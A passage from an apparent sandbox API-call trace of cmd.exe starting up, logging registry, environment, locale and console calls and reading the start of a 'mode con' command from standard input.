lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.801] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x0, lpData=0x4253cfe690*=0x1, lpcbData=0x4253cfe674*=0x1000) returned 0x2 [0158.801] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x0, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.801] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x9, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.801] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x4, lpData=0x4253cfe690*=0x9, lpcbData=0x4253cfe674*=0x4) returned 0x0 [0158.801] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4253cfe670, lpData=0x4253cfe690, lpcbData=0x4253cfe674*=0x1000 | out: lpType=0x4253cfe670*=0x0, lpData=0x4253cfe690*=0x9, lpcbData=0x4253cfe674*=0x1000) returned 0x2 [0158.801] RegCloseKey (hKey=0x7c) returned 0x0 [0158.801] time (in: timer=0x0 | out: timer=0x0) returned 0x5ccf6b8c [0158.801] srand (_Seed=0x5ccf6b8c) [0158.801] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0158.801] malloc (_Size=0x4000) returned 0x1916fc65530 [0158.802] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0158.802] malloc (_Size=0xffce) returned 0x1916fb10080 [0158.802] ??_V@YAXPEAX@Z () returned 0x1916fb10080 [0158.803] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1916fb10080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0158.803] malloc (_Size=0xffce) returned 0x1916fb20060 [0158.803] ??_V@YAXPEAX@Z () returned 0x1916fb20060 [0158.803] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1916fb20060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.804] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0158.804] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.804] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.805] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.805] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.805] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.805] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.805] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.805] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.805] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.805] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.805] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.805] GetProcessHeap () returned 0x1916fa10000 [0158.805] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa16500) returned 1 [0158.805] GetEnvironmentStringsW () returned 0x1916fa15a60* [0158.805] GetProcessHeap () returned 0x1916fa10000 [0158.805] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xace) returned 0x1916fa16540 [0158.806] FreeEnvironmentStringsA (penv="=") returned 1 [0158.808] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0158.808] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.808] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.808] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.808] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.808] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.808] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.808] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.808] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.809] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.809] malloc (_Size=0xffce) returned 0x1916fb30040 [0158.809] ??_V@YAXPEAX@Z () returned 0x1916fb30040 [0158.809] GetProcessHeap () returned 0x1916fa10000 [0158.809] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x38) returned 0x1916fa18580 [0158.809] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1916fb30040 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0158.809] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x1916fb30040, lpFilePart=0x4253cff1f0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x4253cff1f0*="system32") returned 0x13 [0158.810] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0158.810] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x4253cfef20 | out: lpFindFileData=0x4253cfef20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x1916fa185c0 [0158.810] FindClose (in: hFindFile=0x1916fa185c0 | out: hFindFile=0x1916fa185c0) returned 1 [0158.811] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x4253cfef20 | out: lpFindFileData=0x4253cfef20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xfabde9f3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfabde9f3, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x1916fa185c0 [0158.811] FindClose (in: hFindFile=0x1916fa185c0 | out: hFindFile=0x1916fa185c0) returned 1 [0158.811] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0158.811] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0158.811] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0158.811] GetProcessHeap () returned 0x1916fa10000 [0158.811] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa16540) returned 1 [0158.811] GetEnvironmentStringsW () returned 0x1916fa15a60* [0158.811] GetProcessHeap () returned 0x1916fa10000 [0158.811] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xafe) returned 0x1916fa16570 [0158.812] FreeEnvironmentStringsA (penv="=") returned 1 [0158.812] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1916fb10080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0158.812] GetProcessHeap () returned 0x1916fa10000 [0158.812] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18580) returned 1 [0158.812] ??_V@YAXPEAX@Z () returned 0x1 [0158.812] ??_V@YAXPEAX@Z () returned 0x1 [0158.812] GetProcessHeap () returned 0x1916fa10000 [0158.812] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x4016) returned 0x1916fa18580 [0158.812] GetProcessHeap () returned 0x1916fa10000 [0158.812] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18580) returned 1 [0158.812] GetConsoleOutputCP () returned 0x1b5 [0159.312] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0159.312] GetUserDefaultLCID () returned 0x409 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff69534bb78, cchData=8 | out: lpLCData=":") returned 2 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4253cff5b0, cchData=128 | out: lpLCData="0") returned 2 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4253cff5b0, cchData=128 | out: lpLCData="0") returned 2 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4253cff5b0, cchData=128 | out: lpLCData="1") returned 2 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff69534bb68, cchData=8 | out: lpLCData="/") returned 2 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff69534bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff69534bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff69534ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0159.312] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff69534ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0159.313] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff69534ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0159.313] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff69534b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0159.313] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff69534b980, cchData=32 | out: lpLCData="Sun") returned 4 [0159.313] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff69534bb58, cchData=8 | out: lpLCData=".") returned 2 [0159.313] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff69534bb40, cchData=8 | out: lpLCData=",") returned 2 [0159.313] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0159.314] GetProcessHeap () returned 0x1916fa10000 [0159.314] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x0, Size=0x20c) returned 0x1916fa170f0 [0159.314] GetConsoleTitleW (in: lpConsoleTitle=0x1916fa170f0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0159.726] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.726] GetFileType (hFile=0x254) returned 0x3 [0159.727] ApiSetQueryApiSetPresence () returned 0x0 [0159.728] ResolveDelayLoadedAPI () returned 0x7ff8bf27d990 [0159.738] BrandingFormatString () returned 0x1916fa162f0 [0159.761] GetVersion () returned 0x3ad7000a [0159.761] _vsnwprintf (in: _Buffer=0x4253cff710, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x4253cff6a8 | out: _Buffer="10.0.15063") returned 10 [0159.761] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.761] GetFileType (hFile=0x254) returned 0x3 [0159.761] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0159.762] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff695357f60, nSize=0x2000, Arguments=0x4253cff6b0 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0159.762] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x4253cff608, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff608*=0x26, lpOverlapped=0x0) returned 1 [0159.762] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x4253cff6d8 | out: _Buffer="\r\n") returned 2 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] GetFileType (hFile=0x254) returned 0x3 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0159.762] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4253cff6a8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff6a8*=0x2, lpOverlapped=0x0) returned 1 [0159.762] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x4253cff6d8 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] GetFileType (hFile=0x254) returned 0x3 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0159.762] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x4253cff6a8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff6a8*=0x34, lpOverlapped=0x0) returned 1 [0159.762] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x4253cff6d8 | out: _Buffer="\r\n") returned 2 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] GetFileType (hFile=0x254) returned 0x3 [0159.762] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.762] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0159.762] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4253cff6a8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff6a8*=0x2, lpOverlapped=0x0) returned 1 [0159.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff8c81c0000 [0159.763] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="CopyFileExW") returned 0x7ff8c81de830 [0159.763] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="IsDebuggerPresent") returned 0x7ff8c81de300 [0159.763] GetProcAddress (hModule=0x7ff8c81c0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff8c5880a40 [0159.763] ??_V@YAXPEAX@Z () returned 0x1 [0159.763] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.763] GetFileType (hFile=0x248) returned 0x3 [0159.763] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0159.763] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x4253cff518 | out: TokenHandle=0x4253cff518*=0x0) returned 0xc000007c [0159.764] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x4253cff518 | out: TokenHandle=0x4253cff518*=0x94) returned 0x0 [0159.764] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x4253cff4c8, TokenInformationLength=0x4, ReturnLength=0x4253cff4d0 | out: TokenInformation=0x4253cff4c8, ReturnLength=0x4253cff4d0) returned 0x0 [0159.765] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x4253cff4d0, TokenInformationLength=0x4, ReturnLength=0x4253cff4c8 | out: TokenInformation=0x4253cff4d0, ReturnLength=0x4253cff4c8) returned 0x0 [0159.765] NtClose (Handle=0x94) returned 0x0 [0159.765] _vsnwprintf (in: _Buffer=0x7ff695357f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x4253cff358 | out: _Buffer="\r\n") returned 2 [0159.765] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.765] GetFileType (hFile=0x254) returned 0x3 [0159.765] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.765] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0159.765] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4253cff328, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff328*=0x2, lpOverlapped=0x0) returned 1 [0159.765] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0159.765] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1916fb10080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0159.765] malloc (_Size=0x107ce) returned 0x1916fb20060 [0159.766] _vsnwprintf (in: _Buffer=0x1916fb20060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x4253cff368 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0159.766] _vsnwprintf (in: _Buffer=0x1916fb20086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x4253cff368 | out: _Buffer=">") returned 1 [0159.766] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.766] GetFileType (hFile=0x254) returned 0x3 [0159.766] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.766] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0159.766] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x4253cff358, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff358*=0x14, lpOverlapped=0x0) returned 1 [0159.767] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.767] GetFileType (hFile=0x248) returned 0x3 [0159.767] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.767] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.767] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c30, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0159.767] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.767] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.767] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c32, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0159.767] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.767] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.767] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c34, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0159.767] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.767] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.767] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.767] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c36, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0159.767] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.767] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.768] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c38, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0159.768] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.768] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.768] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0159.768] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.768] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.768] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0159.768] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.768] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.768] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0159.768] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.768] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.768] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0159.768] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.768] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.768] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.768] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c42, 